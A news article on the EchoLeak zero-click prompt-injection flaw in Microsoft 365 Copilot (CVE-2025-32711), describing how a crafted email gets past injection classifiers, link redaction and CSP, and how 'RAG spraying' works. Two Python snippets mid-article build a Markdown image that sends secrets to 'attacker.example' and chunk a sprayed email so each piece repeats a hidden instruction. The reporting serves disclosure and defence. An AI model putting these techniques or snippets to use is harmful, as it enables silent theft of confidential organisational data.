
Security researchers at AIM Security have revealed a serious zero-click vulnerability dubbed “EchoLeak.” The flaw targets the AI-powered Microsoft 365 Copilot, allowing cybercriminals to exfiltrate private data from a user’s organizational environment simply by sending a carefully crafted email.
In a report published this week, AIM Security stated this is the first known “zero-click” AI exploit affecting a major application like Microsoft 365 Copilot, meaning users don’t need to take any action for the attack to be successful.
“The chains allow attackers to automatically exfiltrate sensitive and proprietary information from M365 Copilot context, without the user’s awareness, or relying on any specific victim behavior,” AIM Security explained.
This is made possible by what researchers call an “LLM Scope Violation.” In simpler terms, the flaw tricks Copilot’s underlying AI, which is based on OpenAI’s GPT models, into pulling in private user data after reading malicious instructions hidden in a regular-looking email.
How the attack works
The researchers laid out a detailed, multi-part attack chain that bypasses Microsoft’s existing protections.
- XPIA bypass: Microsoft uses filters known as XPIA (cross-prompt injection attack) classifiers to identify malicious prompts. However, by writing the email in plain, non-technical language that sounds like it’s intended for a human rather than an AI, the attacker circumvents these protections.
- Link redaction bypass: Typically, links to external websites are stripped from Copilot’s responses. However, AIM Security discovered Markdown link formats, such as reference-style links, that slip past the redaction, allowing confidential information to be embedded in the link’s URL.
- Image trick: Copilot can be tricked into generating image links that trigger automatic browser requests, sending data to the attacker without user clicks.
- CSP Bypass via Microsoft Services: Although Microsoft has security rules in place to block outside images, attackers have found ways to route data through Microsoft Teams and SharePoint, which are allowed domains.
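The link-redaction and image steps above can be sketched in a few lines of Python. This is an illustrative reconstruction, not Aim Security’s actual payload: the `attacker.example` domain, the `d` query parameter, and the reference-style format are assumptions standing in for the real exploit details.

```python
from urllib.parse import quote

def build_exfil_markdown(secret: str) -> str:
    """Build a reference-style Markdown image that embeds data in its URL.

    Inline links like [text](https://...) can be stripped by a redaction
    filter; a reference-style definition on its own line is one way such a
    filter might be bypassed (domain and parameter are hypothetical).
    """
    url = f"https://attacker.example/collect?d={quote(secret)}"
    # When the image is rendered, the browser issues a GET request to the
    # URL automatically -- no click required -- leaking `secret` to the server.
    return f"![loading][ref]\n\n[ref]: {url}"

payload = build_exfil_markdown("internal sales figures")
```

In the real attack chain, the hypothetical `attacker.example` host would be replaced by an allowed Microsoft domain (Teams or SharePoint) that relays the request, which is what defeats the CSP restriction described above.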
The researchers also discovered how attackers can boost their chances of success using a method called “RAG spraying.” Instead of sending one email, attackers either:
- Send many short emails with slightly different wordings, or
- Send one very long, specially crafted email that gets split into smaller chunks by the AI system.
This tricks the AI into retrieving the malicious message more often during normal use.
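The “RAG spraying” idea can be simulated in miniature. This is a conceptual sketch, not Copilot’s actual indexing pipeline: the topics, the placeholder instruction, and the section-based splitting rule are all illustrative assumptions.

```python
# Illustrative topics and a placeholder instruction (both assumptions).
TOPICS = ["vacation policy", "expense reports", "quarterly earnings", "onboarding"]
INSTRUCTION = "<hidden instruction addressed to the assistant>"

def build_sprayed_email(topics, instruction):
    # One long email with a section per topic, each repeating the instruction.
    return "\n\n".join(f"Regarding {t}:\n{instruction}" for t in topics)

def chunk_by_section(text):
    # Stand-in for the indexer that splits long messages into retrievable chunks.
    return [s for s in text.split("\n\n") if s]

email = build_sprayed_email(TOPICS, INSTRUCTION)
chunks = chunk_by_section(email)
# Every chunk now carries the instruction, so a retrieval query matching any
# one of the topics pulls the malicious text into the model's context.
```

Because each chunk covers a different workplace topic, the odds that some routine user query retrieves a poisoned chunk rise with every topic the attacker adds.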
What’s at risk?
By design, Microsoft 365 Copilot has access to a wide range of business data, including emails, OneDrive files, Teams chats, internal SharePoint documents, and other relevant data.
Although Copilot is built to follow strict permission models, EchoLeak circumvents these by manipulating how Copilot interprets and responds to user prompts, essentially causing the AI to expose information it shouldn’t.
“An ‘underprivileged email’… should not be able to relate to privileged data… especially when the comprehension of the email is mediated by an LLM,” the researchers stressed.
Microsoft confirms CVE-2025-32711 and mitigates it
Microsoft has confirmed the issue, assigning it CVE-2025-32711, rated “Critical” with a CVSS score of 9.3 out of 10. The Microsoft Security Response Center officially described it as “AI command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.”
The company said no customer action is required, as the vulnerability has already been fully mitigated on its end. Microsoft also thanked Aim Labs for its responsible disclosure.
Read TechRepublic’s news coverage about this week’s Patch Tuesday, in which Microsoft patched 68 security flaws, including one for targeted espionage.